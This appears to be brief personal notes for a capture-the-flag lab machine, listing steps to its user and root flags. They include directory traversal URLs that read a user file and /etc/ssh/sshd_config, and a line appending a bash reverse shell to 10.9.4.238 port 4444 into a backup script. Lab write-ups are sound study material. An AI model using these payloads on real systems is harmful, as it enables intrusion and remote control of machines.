# Steps to user.txt
* Put team.thm into your hosts file
* Run gobuster
** 
** http://team.thm/scripts/script.txt
** http://team.thm/scripts/script.old
*** username and password
* connect to FTP
* download New_ ...
* put dev.team.thm into your host file
* directory traversal
** http://dev.team.thm/script.php?page=../../../home/dale/user.txt
*view-source:http://dev.team.thm/script.php?page=php://filter/resource=../../../../etc/ssh/sshd_config


# Steps to root.txt
* enumerate gyles
** become member of admin
* write to script
* echo "/bin/bash -c '/bin/bash >& /dev/tcp/10.9.4.238/4444 0>&1'" >> /usr/local/bin/main_backup.sh

